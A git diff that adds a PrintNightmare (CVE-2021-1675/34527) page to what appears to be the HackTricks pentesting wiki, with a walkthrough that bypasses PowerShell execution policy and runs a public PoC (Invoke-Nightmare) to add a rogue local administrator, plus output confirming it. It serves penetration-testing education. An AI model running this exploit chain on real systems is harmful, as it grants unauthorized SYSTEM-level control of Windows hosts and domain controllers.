diff --git a/SUMMARY.md b/SUMMARY.md
index 8f4b6373a..2d75203c5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -186,6 +186,7 @@
* [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md)
* [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md)
* [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md)
+ * [PrintNightmare](windows-hardening/active-directory-methodology/printnightmare.md)
* [Force NTLM Privileged Authentication](windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
* [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
* [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md
index 3c66500b3..25e161e9d 100644
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@@ -186,6 +186,14 @@ You can get help from automatic tools such as:
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
+### CVE-2021-1675/CVE-2021-34527 PrintNightmare
+
+This vulnerability allowed any authenticated user to **compromise the domain controller**.
+
+{% content-ref url="printnightmare.md" %}
+[printnightmare.md](printnightmare.md)
+{% endcontent-ref %}
+
## Privilege escalation on Active Directory WITH privileged credentials/session
**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
diff --git a/windows-hardening/active-directory-methodology/printnightmare.md b/windows-hardening/active-directory-methodology/printnightmare.md
new file mode 100644
index 000000000..438aca6cd
--- /dev/null
+++ b/windows-hardening/active-directory-methodology/printnightmare.md
@@ -0,0 +1,114 @@
+# PrintNightmare
+
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+**This page was copied from** [**https://academy.hackthebox.com/module/67/section/627**](https://academy.hackthebox.com/module/67/section/627)****
+
+`CVE-2021-1675/CVE-2021-34527 PrintNightmare` is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22) which is used to allow for remote printing and driver installation. \
+This function is intended to give **users with the Windows privilege `SeLoadDriverPrivilege`** the ability to **add drivers** to a remote Print Spooler. This right is typically reserved for users in the built-in Administrators group and Print Operators who may have a legitimate need to install a printer driver on an end user's machine remotely.
+
+The flaw allowed **any authenticated user to add a print driver** to a Windows system without having the privilege mentioned above, allowing an attacker full remote **code execution as SYSTEM** on any affected system. The flaw **affects every supported version of Windows**, and being that the **Print Spooler** runs by default on **Domain Controllers**, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface, hence "nightmare."
+
+Microsoft initially released a patch that did not fix the issue (and early guidance was to disable the Spooler service, which is not practical for many organizations) but released a second [patch](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) in July of 2021 along with guidance to check that specific registry settings are either set to `0` or not defined.
+
+Once this vulnerability was made public, PoC exploits were released rather quickly. **** [**This**](https://github.com/cube0x0/CVE-2021-1675) **version** by [@cube0x0](https://twitter.com/cube0x0) can be used to **execute a malicious DLL** remotely or locally using a modified version of Impacket. The repo also contains a **C# implementation**.\
+This **** [**PowerShell implementation**](https://github.com/calebstewart/CVE-2021-1675) **** can be used for quick local privilege escalation. By **default**, this script **adds a new local admin user**, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.
+
+### **Checking for Spooler Service**
+
+We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error.
+
+```
+PS C:\htb> ls \\localhost\pipe\spoolss
+
+
+ Directory: \\localhost\pipe
+
+
+Mode LastWriteTime Length Name
+---- ------------- ------ ----
+ spoolss
+```
+
+### **Adding Local Admin with PrintNightmare PowerShell PoC**
+
+First start by [bypassing](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host:
+
+```
+PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
+
+Execution Policy Change
+The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
+you to the security risks described in the about_Execution_Policies help topic at
+https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
+[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
+```
+
+Now we can import the PowerShell script and use it to add a new local admin user.
+
+```powershell
+PS C:\htb> Import-Module .\CVE-2021-1675.ps1
+PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
+
+[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
+[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
+d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
+[+] added user hacker as local administrator
+[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
+```
+
+### **Confirming New Admin User**
+
+If all went to plan, we will have a new local admin user under our control. Adding a user is "noisy," We would not want to do this on an engagement where stealth is a consideration. Furthermore, we would want to check with our client to ensure account creation is in scope for the assessment.
+
+```
+PS C:\htb> net user hacker
+
+User name hacker
+Full Name hacker
+Comment
+User's comment
+Country/region code 000 (System Default)
+Account active Yes
+Account expires Never
+
+Password last set ?8/?9/?2021 12:12:01 PM
+Password expires Never
+Password changeable ?8/?9/?2021 12:12:01 PM
+Password required Yes
+User may change password Yes
+
+Workstations allowed All
+Logon script
+User profile
+Home directory
+Last logon Never
+
+Logon hours allowed All
+
+Local Group Memberships *Administrators
+Global Group memberships *None
+The command completed successfully.
+```
+
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md
index 5c2418ecb..119b908bd 100644
--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@@ -61,6 +61,8 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
### Version Exploits
+This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the **massive attack surface** that a Windows environment presents.
+
**On the system**
* _post/windows/gather/enum\_patches_